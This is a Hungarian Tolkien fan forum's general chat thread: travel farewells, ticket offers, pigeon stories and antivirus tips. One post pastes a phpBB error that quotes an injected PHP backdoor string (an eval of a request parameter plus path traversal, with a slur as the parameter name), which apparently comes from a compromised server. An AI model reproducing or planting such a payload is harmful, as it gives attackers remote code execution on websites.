BESZÉLGETŐS topic

Több
19 éve 7 hónapja #249360 Írta: Trinkler
Trinkler válaszolt a következő témában: BESZÉLGETŐS topic
Höhö. Még mindíg jobb lehetett, mint a magyar :) :)
Höhö. ;)

Kérjük, hogy Bejelentkezés vagy vagy Fiók létrehozása, hogy csatlakozhass a beszélgetéshez!

Több
19 éve 7 hónapja #249356 Írta: Meleth_lin
Meleth_lin válaszolt a következő témában: BESZÉLGETŐS topic
Sziasztok!

Képzeljétek, vasárnap este a német RTL-en NÉMETÜL néztem GyU-t! :D
Olyan fura pl tündéket németül hallani! És az az akcentus, amivel a tünde nyelvű szövegeket mondták... :D Hát mit mondjak, érdekes volt...

"(...)That's the most important part of the story: the ending.
This one... is very good. This one's perfect."

Kérjük, hogy Bejelentkezés vagy vagy Fiók létrehozása, hogy csatlakozhass a beszélgetéshez!

Több
19 éve 7 hónapja #249326 Írta: Rabyn
Rabyn válaszolt a következő témában: BESZÉLGETŐS topic
Sziasztok!

óriási kérdésem lenne. Kitaláltam magamnak, hogy még ebben az évebn leteszem érettségi előtt a német nyelvből a középfokút. Kérdésem lenne, hogy hol érdemes, mennyibe kerülhet, milyen előkészítőre érdemes járni, stb stb..

"Én szóra váltanám a gondolatot de félek, hogy nem érdekel.."

Több
19 éve 7 hónapja #249325 Írta: Toma gazda
Toma gazda válaszolt a következő témában: BESZÉLGETŐS topic
érezd jól magad pajti!

:?: :geek:
Milyen foglalkozást vezessek?
:geek: :?:

Több
19 éve 7 hónapja #249314 Írta: Nelossel
Nelossel válaszolt a következő témában: BESZÉLGETŐS topic
Vigyázz magadra és érezd jól magad, Ben! :)

Több
19 éve 7 hónapja #249313 Írta: Gilg (Gwindorn)
Gilg (Gwindorn) válaszolt a következő témában: BESZÉLGETŐS topic
Rossz volt ez a pár nap fórum nélkül :cry: és lehet mondani hogy netfüggő vagyok. Bár némi igazság van benne, annyi pontosítással, hogy inkább tolkien-, vagy MTT "függő" :D Örülök hogy újra műx és köszönet érte! :)

A valák óvjanak utadon, Ben! :)

Több
19 éve 7 hónapja #249268 Írta: Well-of-Souls
Well-of-Souls válaszolt a következő témában: BESZÉLGETŐS topic
Minden jót Ben, vigyázz magadra :)

Man in general, if reduced to himself, is too wicked to be free.
Joseph de Maistre

Több
19 éve 7 hónapja #249260 Írta: Lora
Lora válaszolt a következő témában: BESZÉLGETŐS topic
jó utat Ben! és hozz nagyon sook fotót! :)

jómagam is most, húsvétra érkeztem haza, jártam párizsban, angliában :) ^^''

Gyöngycem (voltam valaha)

Több
19 éve 7 hónapja #249259 Írta: Ben
Ben válaszolt a következő témában: BESZÉLGETŐS topic
Na gyerekek, inkább most írok, holnap sztem már nem tudok netre kerülni.
A héten már nem leszek elérhető neten (telón se), mert utazunk ki Amszterdamba (apa meg ki, és megyünk vele :) ). Tökjó! :D
Aki gondolja, kukkantsdon rá erre a webkamerára. :lol: Nem fogunk egész nap ott szobrozni, de valamikor megnézzük. :D Fotókat meg hozok haza. :)
Jók legyetek, meg rosszak, sziasztok (előre is)! :)

basking in the sunshine of a bygone afternoon,
bringing sounds of yesterday into this city room.

Több
19 éve 7 hónapja #249253 Írta: Lora
Lora válaszolt a következő témában: BESZÉLGETŐS topic
navééégre van fórum meg tolkien.hu is :)

már három napja nem jött be és nekemis ezt írta ki, ami itt lejjebb olvasható

továbbá a chaten meddig fognak telelni bizonyos zorg szobában azok a botok?

Gyöngycem (voltam valaha)

Több
19 éve 7 hónapja #249244 Írta: nita
nita válaszolt a következő témában: BESZÉLGETŐS topic
Engem inkább az érdekel, hogy miért nem tudok belépni (Nelossel). :( Mindig ezt írja ki:

phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 279
File : /home/www/www/html/tolkien.hu/html/forum/includes/functions.php

Azt hittem, hogy a géppel van a baj, de egy másik gépen is ugyanezt csinálja. Tudja valaki miért :?:

Több
19 éve 7 hónapja #249234 Írta: Drowse
Drowse válaszolt a következő témában: BESZÉLGETŐS topic

Amy írta: Drowse: Nekem igen :lol:
[size=9:q7rle8ey]Jó, tudom, nem volt vicces. Ha. Ha. ha. ;) [/size]

nem, nem volt vicces :P

"All right, all right. I can take a hint. I know when I'm not wanted. I usually don't pay any attention... but I know."

Több
19 éve 7 hónapja #249233 Írta: Trinkler
Trinkler válaszolt a következő témában: BESZÉLGETŐS topic
Drowse: Nekem igen :lol:
[size=9:ay43fmtj]Jó, tudom, nem volt vicces. Ha. Ha. ha. ;) [/size]

Több
19 éve 7 hónapja #249232 Írta: Drowse
Drowse válaszolt a következő témában: BESZÉLGETŐS topic
nektek bejön rendesen a fórum? :)

"All right, all right. I can take a hint. I know when I'm not wanted. I usually don't pay any attention... but I know."

Több
19 éve 8 hónapja #249193 Írta: Ringbearer
Ringbearer válaszolt a következő témában: BESZÉLGETŐS topic
Népek!
Dés László lemezbemutató koncert (Utcazene)
lesz ápr. 1-jén a Madách színházban 7-től. 2 jegy eladó, egy jegy ára 1000 ft.
Akit érdekel, kérem mihamarabb írjon nekem.

"Be the change you want to see." Gandhi

Több
19 éve 8 hónapja - 19 éve 8 hónapja #249189 Írta: Olorin.papa
Olorin.papa válaszolt a következő témában: BESZÉLGETŐS topic

Rabyn írta: Eh... kidobáltuk a dögöt.. Erre ma KIKELET EGY TOJÁSBÓL VAGY 4-5 GALAMB.. Tegnap eskü még ott se volt a fészek.. Anyám nem nyírja ki őket.. de ha kirepültek. hajajj milesz itt:DD

Ez egy kicsit érdekes :roll: :?: Egy tojásból 4-5 galamb? :eek2: Tudtommal még nem csernobilban lakol... :D

"Már születésem óta haldoklom,kissé hosszúra nyúlik. Unom."

Több
19 éve 8 hónapja #249184 Írta: Rabyn
Eh... kidobáltuk a dögöt.. Erre ma KIKELET EGY TOJÁSBÓL VAGY 4-5 GALAMB.. Tegnap eskü még ott se volt a fészek.. Anyám nem nyírja ki őket.. de ha kirepültek. hajajj milesz itt:DD

Több
19 éve 8 hónapja #249178 Írta: Panni
Panni válaszolt a következő témában: BESZÉLGETŐS topic

Gilgolwen Nimrandir írta: Rákerestem megtaláltam és letöltöttem, holnap majd telepíteni is fogom, de ma már túlságosan is keresztbe állnak a szemeim, oan álmos vagyok :)

OFF
Hát, igen.... Az alvás csodákra képes ;) :P :twisted:
ON

"Amikor táncolsz, nem az a célod, hogy egy bizonyos pontra megérkezz a táncparketten, hanem hogy minden lépést élvezz, míg odaérsz." (Wayne Dyer)

Több
19 éve 8 hónapja #249167 Írta: Gilg (Gwindorn)

Alcarcalimo írta: Keress ra a NOD32-re a Google-val... (most lusta vagyok) az jo kis viruskiller...

Bár tényleg sikerrel jártam és telepítettem egy vírusirtót azért neked is köszönöm Alcar :) Rákerestem megtaláltam és letöltöttem, holnap majd telepíteni is fogom, de ma már túlságosan is keresztbe állnak a szemeim, oan álmos vagyok :)

Neked is köszi Newra. :D Olyan rendesek vagytok, meg sem érdemlem :oops:

Több
19 éve 8 hónapja #249165 Írta: Newra
Newra válaszolt a következő témában: BESZÉLGETŐS topic
Gilgolwen ha még esetleg nem sikerült volna itt egy cím:

origo.hu/szoftverbazis/virusvedelem/index.html

Me is a Nod32-t ajánlja, itt megtalálod! ;) :)

Van mi arany, bár nem fénylik...

Több
19 éve 8 hónapja #249164 Írta: Leguanember
Leguanember válaszolt a következő témában: BESZÉLGETŐS topic
Szervusztok Versszeretők, Ékesszólók -Jóbarátok!

Közeleg ez év április 11-e, József Attila egyszázadik születésnapja, melynek alkalmából ünnepelni hívlak Titeket. Immáron negyedik éve a Fillér Utcai Általános Iskola folyamatos versmondással emlékezik a költészet napján, mely egyben rekordkísérlet is. várnak mindenkit, akinek szívügye a vers, akár az iskola tanulója, akár az utcáról betévedő vendég. Gyertek el Ti is, és szavaljátok, olvassátok egy magyar költő versét; együtt tisztelegve a babérkoszorúk előtt!

Április 11-én, hétfőn délután három órától a Moszkva tértől öt percre.
:!: Ha csatlakoztok a csapathoz, írjatok nekem privit vagy emilt (ld. a hozzászólás alsó menüsorában) április 6-ig a választott verssel, polgári nevetekkel :!:

TEGYETEK JÓT, MERT TUDTOK.
Minden más hiábavalóság.

Több
19 éve 8 hónapja #249159 Írta: Alcarcalimo
Alcarcalimo válaszolt a következő témában: BESZÉLGETŐS topic

Gilgolwen Nimrandir írta: Más: lenne két kérdésem, ill kérésem.

Az első, hogy tudna e valaki egy linket adni, ahonnan le tudnék tölteni egy vírusirtót (free), mert ami eddig volt, felmondta a szolgálatot. :roll:

A másik pedig, hogy tudna e valaki mondani nekem gospell dalcímeket?
Próbáltam keresgélni a neten, nem túl nagy sikerrel.

Előre is köszi :)

Keress ra a NOD32-re a Google-val... (most lusta vagyok) az jo kis viruskiller...

Több
19 éve 8 hónapja #249146 Írta: Gilg (Gwindorn)
Köszönöm a segítséget mindenkinek, itt a fórumon is és a priv üzenetben érkezett segítséget is :) Sikerrel jártam! :D

olorin.papa írta: Persze ez csak ott célravezető, ahol a dög nem zavar senkit. Pl. egy erkélyen azért nem mutat jól :roll:

nem mutat jól... :lol:

Több
19 éve 8 hónapja #249132 Írta: Panni
Panni válaszolt a következő témában: BESZÉLGETŐS topic

Gilgolwen Nimrandir írta:

idézet írta: Más: lenne két kérdésem, ill kérésem.

Az első, hogy tudna e valaki egy linket adni, ahonnan le tudnék tölteni egy vírusirtót (free), mert ami eddig volt, felmondta a szolgálatot. :roll:

Sajnos nem jártam sikerrel Snuffles linkjével, bár lehet hogy csak elbénáztam, de nem hajlandó feltelepíteni. :roll: Ezért továbbra is szeretném kérni a segítségeteket. Köszi!

Én nem értek hozzá, de találtam egy ilyet.... www.up-consulting.hu/html/html_s ... avast.html
remélem használható :roll:

"Amikor táncolsz, nem az a célod, hogy egy bizonyos pontra megérkezz a táncparketten, hanem hogy minden lépést élvezz, míg odaérsz." (Wayne Dyer)

Több
19 éve 8 hónapja #249125 Írta: Olorin.papa
Olorin.papa válaszolt a következő témában: BESZÉLGETŐS topic

Rabyn írta: Megtaláltuk a legjobb galamb ellenes módszert:DDD
Történt ugyanis, hogy az utobbi időben nagy nagy csend volt az erkélyen. Most mentünk volna ki és mit látunk kint? Egy döglött galambot. Hát ezért volt ilyen nagy csend:DDD Persze a dögöt már eltakarítottuk, de remélem, hogy többé nem jönnek ide a galambok..

:D Et már nagyon régi módszer! 8) /me is alkalmazta már...
Az állatok ösztönösen eriadnak onnét, ahol egy "kolléga" tetemét látják... :wink:
Persze ez csak ott célravezető, ahol a dög nem zavar senkit. Pl. egy erkélyen azért nem mutat jól :roll:

"Már születésem óta haldoklom,kissé hosszúra nyúlik. Unom."

Több
19 éve 8 hónapja #249103 Írta: Gilg (Gwindorn)

idézet írta: Más: lenne két kérdésem, ill kérésem.

Sajnos nem jártam sikerrel Snuffles linkjével, bár lehet hogy csak elbénáztam, de nem hajlandó feltelepíteni. :roll: Ezért továbbra is szeretném kérni a segítségeteket. Köszi!

Több
19 éve 8 hónapja #249101 Írta: Rabyn
Megtaláltuk a legjobb galamb ellenes módszert:DDD
Történt ugyanis, hogy az utobbi időben nagy nagy csend volt az erkélyen. Most mentünk volna ki és mit látunk kint? Egy döglött galambot. Hát ezért volt ilyen nagy csend:DDD Persze a dögöt már eltakarítottuk, de remélem, hogy többé nem jönnek ide a galambok..

Több
19 éve 8 hónapja #249069 Írta: Gilg (Gwindorn)

Snuffles írta: hááát bátyus, ilyet tudok csak... :/

kereso.prim.hu/index.prm?ps=10&t ... m=11&dd=01

Kösziiii :D pusszancs!

Több
19 éve 8 hónapja #249068 Írta: Snufi
Snufi válaszolt a következő témában: BESZÉLGETŐS topic
hááát bátyus, ilyet tudok csak... :/

kereso.prim.hu/index.prm?ps=10&t ... m=11&dd=01

"Well, I'm back."

Több
19 éve 8 hónapja #249067 Írta: Gilg (Gwindorn)
Más: lenne két kérdésem, ill kérésem.

Moderátorok: GandalfAlyr ArkhonKincsőMetafloraAlew
Oldalmegjelenítési idő: 3.430 másodperc

SSL Security
Comodo SSL Certificate

Vissza a lap tetejére